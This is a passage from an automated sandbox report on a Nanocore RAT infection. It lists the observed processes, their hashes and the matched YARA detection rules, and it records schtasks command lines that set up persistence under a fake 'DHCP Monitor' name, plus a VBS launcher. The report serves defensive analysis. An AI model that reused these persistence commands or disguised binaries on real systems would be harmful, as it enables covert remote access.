                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Reputation:high

                                                  Target ID:4
                                                  Start time:08:10:12
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
                                                  Imagebase:0x2c0000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:5
                                                  Start time:08:10:12
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low

                                                  Target ID:6
                                                  Start time:08:10:13
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7fcd70000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:7
                                                  Start time:08:10:13
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
                                                  Imagebase:0x2c0000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:8
                                                  Start time:08:10:13
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7fcd70000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:9
                                                  Start time:08:10:14
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
                                                  Imagebase:0xc60000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Target ID:10
                                                  Start time:08:10:15
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7fcd70000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:11
                                                  Start time:08:10:15
                                                  Start date:02/02/2023
                                                  Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
                                                  Imagebase:0x400000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs

                                                  Target ID:12
                                                  Start time:08:10:15
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7fcd70000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:13
                                                  Start time:08:10:21
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
                                                  Imagebase:0x7ff60c2e0000
                                                  File size:163840 bytes
                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  Target ID:16
                                                  Start time:08:10:24
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

                                                  Target ID:17
                                                  Start time:08:10:33
                                                  Start date:02/02/2023
                                                  Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
                                                  Imagebase:0x840000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET

                                                  Target ID:18
                                                  Start time:08:10:33
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7fcd70000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  Target ID:19
                                                  Start time:08:10:34
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0x910000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: unknown

                                                  Target ID:20
                                                  Start time:08:10:40
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0x9c0000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET

                                                  Target ID:21
                                                  Start time:08:10:41
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

                                                  Target ID:22
                                                  Start time:08:10:50
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
                                                  Imagebase:0x7ff60c2e0000
                                                  File size:163840 bytes
                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  Target ID:23
                                                  Start time:08:10:55
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
